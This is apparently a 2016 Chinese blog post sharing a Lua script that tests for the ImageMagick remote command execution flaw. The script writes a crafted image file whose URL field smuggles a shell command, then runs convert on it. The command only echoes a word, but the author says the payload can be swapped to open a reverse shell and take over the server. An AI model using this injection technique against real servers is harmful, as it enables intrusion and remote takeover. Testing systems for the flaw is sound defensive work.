Sevck:ImageMagick远程命令执行工具检测工具

技术 作者:站内编辑 2016-05-05 10:31:22 阅读:601
737185-20160505161804826-1297089543 737185-20160505161812466-1280321491 ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下 效果图: 737185-20160505161949122-154715531 用lua写了一个检测脚本 1 print ("Checking...") 2 file=io.open("exp.jpg","w") 3 --file:write("s") 4 file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n") 5 file:write("fill 'url(https://example.com/image.jpg") 6 file:write('"|echo "success!!!)') 7 file:write("'\r\n") 8 file:write("pop graphic-context") 9 file:close() 10 cmd=io.popen("convert exp.jpg test.png") 11 result=cmd:read("*all") 12 print(result) 如果存在返回 737185-20160505162250872-1158735855s
当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限   附上一篇分析文章: http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0
 

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

图库
关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接